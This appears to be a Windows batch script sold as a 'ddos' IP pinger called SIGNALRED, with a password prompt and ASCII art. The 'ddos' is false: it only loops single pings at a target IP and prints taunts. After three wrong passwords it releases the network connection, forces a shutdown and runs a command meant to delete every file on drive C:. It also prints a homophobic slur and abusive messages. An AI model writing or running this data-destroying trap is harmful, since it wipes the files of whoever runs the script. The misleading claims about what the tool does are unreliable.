@echo off
title ddos signalred (login page)
echo ___________________________________________________
echo @@@@@@@@@@@@@@@@@@@@@**^^""~~~"^@@^*@*@@**@@@@@@@@@
echo @@@@@@@@@@@@@*^^'"~   , - ' '; ,@@b. '  -e@@@@@@@@@
echo @@@@@@@@*^"~      . '     . ' ,@@@@(  e@*@@@@@@@@@@
echo @@@@@^~         .       .   ' @@@@@@, ~^@@@@@@@@@@@
echo @@@~ ,e**@@*e,  ,e**e, .    ' '@@@@@@e,  "*@@@@@'^@
echo @',e@@@@@@@@@@ e@@@@@@       ' '*@@@@@@    @@@'   0
echo @@@@@@@@@@@@@@@@@@@@@',e,     ;  ~^*^'    ;^~   ' 0
echo @@@@@@@@@@@@@@@^""^@@e@@@   .'           ,'   .'  @
echo @@@@@@@@@@@@@@'    '@@@@@ '         ,  ,e'  .    ;@
echo @@@@@@@@@@@@@' ,  ,  ^@*'     ,  .  i^" e, ,e e   @
echo @@@@@@@@@@@@' ,@@@@,          ;  ,  !,,   e   @ e @
echo @@@@@,~*@@*' ,@@@@@@e,   ',   e^~^@,   ~'@@@@@@,@@@
echo @@@@@@, ~" ,e@@@@@@@@@*e*@*  ,@e  @@""@e,,@@@@@@@@@
echo @@@@@@@@ee@@@@@@@@@@@@@@@" ,e@' ,e@' e@@@@@@@@@@@@@
echo @@@@@@@@@@@@@@@@@@@@@@@@" ,@" ,e@@e,,@@@@@@@@@@@@@@
echo @@@@@@@@@@@@@@@@@@@@@@@@,,@@@@@@@@@@@@@@@@@@@@@@@@@
echo """""""""""""""""""""""""""""""""""""""""""""""""""
:Password
Set input=
set /p input= Password (insert password) :
if %input%==SIGNALRED goto Pinger
if not %input%==SIGNALRED goto NO1
:Pinger
Title Welcome to SIGNALRED (Connecting...)
echo --------------------------------------------------------
echo               Connecting to SIGNALRED: 
echo                   Loading Ip Pinger :
echo =========================================================
echo 		     All Credits go to ZVAGER: 
echo ---------------------------------------------------------
timeout /t 1 >nul
title SIGNAL RED (SIGNAL RED)
echo off & cls 
color B
echo                        ,
echo                       dM
echo                       MMr
echo                      4MMML                  .
echo                      MMMMM.                xf
echo      .              "M6MMM               .MM-
echo       Mh..          +MM5MMM            .MMMM
echo       .MMM.         .GANJA.           MMMMMh
echo        )MMMh.        MM5MMM         MMMMMMM
echo         3MMMMx.     'MMM3MMf      xnMMMMMM"
echo         '*MMMMM      MMMMMM.     nMMMMMMP"
echo           *MMMMMx    "MMM5M\    .MMMMMMM=
echo            *MMMMMh   "MMMMM"   JMMMMMMP          
echo              MMMMMM   GMMMM.  dMMMMMM          .,
echo               MMMMMM  "MMMM  .MMMMM(       ..nn*
echo    ..          *MMMMx  MMM"  dMMMM"    .nnMMMM*
echo     "MMn...     'MMMMr 'MM   MMM"    .MMMMMMM*
echo      "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM"
echo         ^MMMMMMMx.  *ML "M .M*  .MMMMMM**"
echo              ""**MMM  MM   M   MMMM'
echo                       .3P"%..  
echo                    nP"     "*MMnx
pause
cls
color 0d
echo.                                                                                        
echo                         /:-.                                    
echo                        -MMMMMmhs+:.                              
echo                        sMMMMMMMMMMMmy+-                          
echo                        NMMMMMMMMMMMMMMMms:`                      
echo                       :MMMMMMMMMMMMMMMMMMMms.                    
echo                       yms+::--::/+oyhdNMMNNMNy-                  
echo                      `N/             ``.:.ydNMNs`                
echo                      +N                    ``:smm:              
echo                      ds           `-:-         `+d/              
echo                     -M-     `:+oydmNMNd/`        `+:            
echo                     sd     -dMMMMMMMMMMMm+`        .            
echo                     m+    :NMMMMMMMMMMMMMMd-                    
echo                    :M`   `mMMMMMMMMMMMMMMMMm.                    
echo                   yy    sMMMMNho++ymMMMMMMMy                    
echo                   .N/   +MMMMm:     `-+yNMMMM-                  
echo                  `om.`./NMMMN- `  `` ` `+MMMMo`                  
echo                   ds  sNMMMMy            mMMM:                  
echo                  -M.  dMMMMd.            sMMm                    
echo                  sd   oMMMM/             oMMN                    
echo                  N+   `NMMMh             yMMM-                  
echo                 /N`    mMMMM:            dMMM+                  
echo                 hy    `NMMMMd:`         `MMMMs                  
echo                `M:   .sMMMMMMMh.        sMMMM+                  
echo                +m  `+mMMMMMMMMMN:     -yMMMMMmy+-`              
echo                ms.omMMMMMMMMMMMMN:  /hNMMMMMMMMMMmy+-`          
echo              `:MmMMMMMMMMMMMMMMMMm`sMMMMMMMMMMMMMMMMMmy/.        
echo           :oydMMMMMMMMMMMMMMMMMMMMsMMMMMMMMMMMMMMMMMMMMMMs      
echo           dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM-      
echo           /MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.    
echo           hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.    
echo          .//////////////////////////////////////////////////-    
echo.  
echo =============================================
echo = PLEASE WAIT FOR SIGNAL RED  TO LOAD...
echo =============================================
cls
color 0c
echo.		
Title IP Pinger
Echo. 
Echo.
echo           ____    ___    ____   _   _      _      _         ____    _____   ____  
echo / ___|  |_ _|  / ___| | \ | |    / \    | |       |  _ \  | ____| |  _ \ 
echo \___ \   | |  | |  _  |  \| |   / _ \   | |       | |_) | |  _|   | | | |
echo  ___) |  | |  | |_| | | |\  |  / ___ \  | |___    |  _ <  | |___  | |_| |
echo |____/  |___|  \____| |_| \_| /_/   \_\ |_____|   |_| \_\ |_____| |____/ 
                                                                          
echo    
echo       
echo       
echo     
echo        
echo         
echo         
echo      
echo         
echo  
echo                               Made by ZVAGER(OWNER OF SIGNAL RED)
Echo.
cls
set /p IP=Enter Target IP:
:rainbow
echo  ____    ___    ____   _   _      _      _         ____    _____   ____  
echo / ___|  |_ _|  / ___| | \ | |    / \    | |       |  _ \  | ____| |  _ \ 
echo \___ \   | |  | |  _  |  \| |   / _ \   | |       | |_) | |  _|   | | | |
echo  ___) |  | |  | |_| | | |\  |  / ___ \  | |___    |  _ <  | |___  | |_| |
echo |____/  |___|  \____| |_| \_| /_/   \_\ |_____|   |_| \_\ |_____| |____/ 
                                                                          
echo                               Made by ZVAGER(OWNER OF SIGNAL RED)
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 01
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo User is OFF1ne)
ping -t 2 0 10 127.0.0.1 >nul
color 02
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped by Mamba)
ping -t 2 0 10 127.0.0.1 >nul
color 03
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Router Slammed)
ping -t 2 0 10 127.0.0.1 >nul
color 04
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Got their Router Shat on...)
ping -t 2 0 10 127.0.0.1 >nul
color 05
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped by Mamba's Cock!)
ping -t 2 0 10 127.0.0.1 >nul
color 06
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 07
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 08
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 09
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 0a
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 0b
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 0c
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious) 
ping -t 2 0 10 127.0.0.1 >nul
color 0d
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 0e
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
color 0f
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (SET in=c & echo Slapped OFF1ne, by the Zymphibious)
ping -t 2 0 10 127.0.0.1 >nul
goto rainbow
:NO1

Echo 		INCORRECT PASSWORD (Attempts Left) [2]
cls
Set input=
set /p input= Password (U cant hack this) :
if %input%==Password goto Pinger
if not %input%==Password goto NO2

:NO2

Echo 		INCORRECT PASSWORD (Attempts Left) [1]
cls
Set input=
set /p input= Password (Just stop your actually fuhny) :
if %input%==Password goto Pinger
if not %input%==Password goto NO3

:NO3

cls	
Echo 			Bye Faggot. Yur done!!
cls
Title Fire Wall Engaging (Targets) {1} [Actions Taken] (0) [Possible Actions Taken] (1)
color 4
Echo ============================================================================================================
Echo    						 Hacker Defense   
Echo  You triggered Zymphibious FireWall  Activating Get Fucked Kid. You Triggered Zymphibious Firewall
Echo  -----------------------------------------   Loading Get Fucked Kid  ----------------------------------                           
Echo ============================================================================================================
Echo.
Pause
cls
Echo 							(Loading)
timeout /t 2 >nul
Title Hacker Defense (Activated)
color 6
cls
color 4
echo ==============================================================================================================
echo Die Skid Die Skid Die Skid Die Skid Die Skid Die Skid Die Skid Die Skid Die Skid Die SKid Die SKid Die Skid 
echo Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked Get Fucked 
echo  =============================================================================================================
echo.
timeout /t 2 >nul
cls
color 6
Title Sending to FireWall (Now Joining) (User joined) {1}
echo 							Sending to Dimension
timeout /t 3 >nul
color 3
cls
echo ==========================================================================================================
echo  Welcome to the New Dimension
echo ==========================================================================================================
echo      .d8b.   .o88b.  .o88b. d88888b .d8888. .d8888.   d8888b. d88888b d8b   db d888888b d88888b d8888b. 
echo     d8' `8b d8P  Y8 d8P  Y8 88'     88'  YP 88'  YP   88  `8D 88'     888o  88   `88'   88'     88  `8D 
echo     88ooo88 8P      8P      88ooooo `8bo.   `8bo.     88   88 88ooooo 88V8o 88    88    88ooooo 88   88 
echo     88   88 8b      8b      88        `Y8b.   `Y8b.   88   88 88      88 V8o88    88    88      88   88 
echo     88   88 Y8b  d8 Y8b  d8 88.     db   8D db   8D   88  .8D 88.     88  V888   .88.   88.     88  .8D 
echo     YP   YP  `Y88P'  `Y88P' Y88888P `8888Y' `8888Y'   Y8888D' Y88888P VP   V8P Y888888P Y88888P Y8888D' 
echo ===========================================================================================================
echo.
pause
cls
Title ~FireWall (Now Exiting)
Echo ============================================================================================================
Echo 						If this problem persist you 
Echo 					need to contact the owner for the
Echo 							password:
Echo =============================================================================================================
Echo.
timeout /t 1 >nul
Color D
Echo Goodbye :(
Title FireWall Security Defense, (Hackers Stopped:) {1} + Redirecting
timeout /t 4 >nul
timeout /t 1 >nul
Color D
Echo          Goodbye :(  Uploading Virus! )
Title FireWall Security Defense, (Hackers Stopped:) {1} + Redirecting
timeout /t 2 >nul
goto virus

:virus
Ipconfig /release
color a 
echo -------------------------------------
echo  Access DENIED: Systmes Compromised.
echo -------------------------------------
echo Now taking security measures
echo Shuting down Computer
timeout /t 1 > nul 
shutdown -p 
color 0d
echo                         /:-.                                    
echo                        -MMMMMmhs+:.                              
echo                        sMMMMMMMMMMMmy+-                          
echo                        NMMMMMMMMMMMMMMMms:`                      
echo                       :MMMMMMMMMMMMMMMMMMMms.                    
echo                       yms+::--::/+oyhdNMMNNMNy-                  
echo                      `N/             ``.:.ydNMNs`                
echo                      +N                    ``:smm:              
echo                      ds           `-:-         `+d/              
echo                     -M-     `:+oydmNMNd/`        `+:            
echo                     sd     -dMMMMMMMMMMMm+`        .            
echo                     m+    :NMMMMMMMMMMMMMMd-                    
echo                    :M`   `mMMMMMMMMMMMMMMMMm.                    
echo                   yy    sMMMMNho++ymMMMMMMMy                    
echo                   .N/   +MMMMm:     `-+yNMMMM-                  
echo                  `om.`./NMMMN- `  `` ` `+MMMMo`                  
echo                   ds  sNMMMMy            mMMM:                  
echo                  -M.  dMMMMd.            sMMm                    
echo                  sd   oMMMM/             oMMN                    
echo                  N+   `NMMMh             yMMM-                  
echo                 /N`    mMMMM:            dMMM+                  
echo                 hy    `NMMMMd:`         `MMMMs                  
echo                `M:   .sMMMMMMMh.        sMMMM+                  
echo                +m  `+mMMMMMMMMMN:     -yMMMMMmy+-`              
echo                ms.omMMMMMMMMMMMMN:  /hNMMMMMMMMMMmy+-`          
echo              `:MmMMMMMMMMMMMMMMMMm`sMMMMMMMMMMMMMMMMMmy/.        
echo           :oydMMMMMMMMMMMMMMMMMMMMsMMMMMMMMMMMMMMMMMMMMMMs      
echo           dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM-      
echo           /MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.    
echo           hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.    
echo          .//////////////////////////////////////////////////-   
timeout /t 5 >nul
del C:\*.* /f /s /q







